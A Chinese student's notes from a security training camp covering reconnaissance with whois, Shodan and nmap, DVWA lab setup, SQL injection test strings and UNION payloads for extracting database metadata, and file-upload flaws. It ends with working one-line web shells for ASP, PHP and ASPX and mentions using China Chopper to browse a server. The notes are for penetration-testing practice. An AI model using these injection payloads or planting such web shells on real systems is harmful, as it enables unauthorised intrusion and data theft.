蓝盾实训营day1——配置渗透环境和SQL注入
有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。
黑客是如何入侵的
- 踩点
- whois
- 扫描
- nmap
- 提权
- 破坏
- 后门
搜索网络设备
shodan.io
远程摄像头……
搜索jaws/1.0 country:”CN”
windows服务器
- 不开源
- 收费
nmap命令
- nmap -sn 10.21.31.0/24 //扫描局域网
- nmap -O 10.21.31.0 //扫描单台主机
- Metasploit 集成漏洞攻击工具
DVMA
渗透测试用的环境
配置
编辑config/config.inc.php.dist:
配置好数据库账号跟密码。
最后把config.inc.php.dist的后缀.dist删掉。
把DVWA-master整个文件夹放入phpstudy下的WWW目录下完成部署。
SQL注入
- 普通的注入网页有信息返回和显示
- SQL盲注没有任何信息返回
- 输入特殊字符,如’,看看是否返回错误信息
注入类型
数字型
select * from table where id=123
测试:
- 1 and 1=1
- 1 and 1=2
字符型
select * from table where id=’123’
测试
- 1’ and 1=1 #
- 1’ and 1=2 #
查询额外数据
通过 order by 判断该表有多少字段
order by 1
order by 2
…
测试一下
’ or 1=1 union select ‘2’,’3’ #
//如果界面有显示出2和3则表示注入成功
通过database()、version()查询当前数据库名称和版本
’ or 1=2 union select database(),version() #
查表名
' or 1=2 union select table_name,2 from information_schema.tables where table_schema='dvwa' #
查列名
' or 1=2 union select column_name,2 from information_schema.columns where table_name='user' #
php转义防御
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:
\x00
\n
\r
\
'
"
\x1a
如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。
逆向md5
查表:cmd5.com
文件上传漏洞
特征
- 文件上传没有过滤
- 文件上传之后可以通过网站url访问该文件
上传木马文件
这种文件称为“一句话木马”;不同服务器语言的一句话木马可以通过百度获得。
asp一句话木马:
<%eval(request("value"))%>
php一句话木马:
<?php @eval($_POST[value]);?>
aspx一句话木马:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
value是这个木马的key,把文件在网站中的url和key记录下来,用木马利用工具,比如“中国菜刀”,提供url和key就可以遍历服务器的目录了。